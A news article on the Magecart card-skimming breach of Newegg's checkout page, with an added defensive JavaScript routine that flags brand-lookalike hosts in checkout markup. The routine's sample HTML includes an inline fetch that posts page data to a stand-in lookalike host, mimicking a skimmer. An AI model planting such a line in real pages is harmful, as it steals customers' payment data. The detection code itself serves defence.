The infamous criminal collective known as Magecart has infiltrated the Newegg site and stolen payment card details belonging to the company's customers. This is a critical breach of the online merchant's systems, as the criminals were able to obtain a very large database of sensitive content. It is yet another infiltration by this hacker group, which shows that its members are capable of getting into many major online services and companies.
Magecart Hackers Hacked Newegg & Acquired Customer Payment Card Data
The attack mechanism that allowed the intrusion relied on a similar-sounding domain called neweggstats, which appears to have been created back in 2015. The hackers were able to acquire an SSL certificate for it, issued by a legitimate provider. By infiltrating the Newegg servers, and specifically the checkout page used by the payment processor, they made sure that the hacker-controlled page would be the one to acquire the information.
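Because the lookalike domain carried a valid certificate, TLS alone gives a defender no signal here; what can be checked is which hosts the checkout page references. The following is an added example, not code from the original article or from Newegg, that audits checkout markup for hosts reusing the brand name outside the first-party domain. The HTML sample, `neweggstats.example`, `cdn.payments.example`, the allow-list and the use of `newegg.com` as the first-party domain are constructed assumptions.

```javascript
// Added example: audit a checkout page for third-party hosts that imitate the
// merchant's brand. All hostnames and the HTML below are constructed samples.
const FIRST_PARTY = "newegg.com";          // assumed first-party registrable domain
const BRAND = "newegg";                    // label a lookalike would reuse
const ALLOWED = new Set(["cdn.payments.example"]); // hypothetical approved vendor

// Constructed checkout markup: one first-party script, one approved vendor,
// and one inline script that references a brand-lookalike host.
const SAMPLE_HTML = `
<script src="https://secure.newegg.com/js/checkout.js"></script>
<script src="https://cdn.payments.example/v2/widget.js"></script>
<script>
  fetch("https://neweggstats.example/collect", { method: "POST", body: data });
</script>`;

// Collect every absolute http(s) URL host, from src attributes and inline code.
function extractHosts(html) {
  const hosts = new Set();
  for (const m of html.matchAll(/https?:\/\/[^\s"'<>)]+/gi)) {
    try { hosts.add(new URL(m[0]).hostname.toLowerCase()); } catch { /* skip malformed */ }
  }
  return [...hosts];
}

// True only for the merchant's own domain and its subdomains.
function isFirstParty(host) {
  return host === FIRST_PARTY || host.endsWith("." + FIRST_PARTY);
}

// Classify each host. A brand-bearing host outside the first-party domain is
// the highest-priority finding, since a valid TLS certificate says nothing
// about who owns it.
function auditCheckout(html) {
  return extractHosts(html).map((host) => {
    let verdict = "unknown-third-party";
    if (isFirstParty(host)) verdict = "first-party";
    else if (ALLOWED.has(host)) verdict = "allowed-vendor";
    else if (host.replace(/[^a-z0-9]/g, "").includes(BRAND)) verdict = "brand-lookalike";
    return { host, verdict };
  });
}

console.log(auditCheckout(SAMPLE_HTML));
```

Run against a saved copy of the rendered checkout page on a schedule, a check like this flags a new brand-bearing host as soon as it appears in the markup.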
Both desktop and mobile customers are affected by the breach; however, the number of affected customers is not known. Statistics show that the site has more than 50 million visitors. The fact that the digital skimmer code was in place for a significant period of time gives security researchers reason to believe that millions of customers are potentially affected.
Two years ago, a report showed that the same collective was responsible for another major attack focusing on a large number of sites. A similar strategy was used back then, showing that the criminals specialize in this approach.
Following the incident, Newegg posted a tweet with their comment:
Yesterday we learned one of our servers had been injected with malware which was identified and removed from our site. We’re conducting extensive research to determine exactly what info was obtained and are sending emails to customers potentially impacted. Please check your email
— Newegg (@Newegg) September 19, 2018
We anticipate that the Magecart hackers will continue with their attacks. The worrisome fact is that there is no information available about the exact way they were able to breach the secure servers.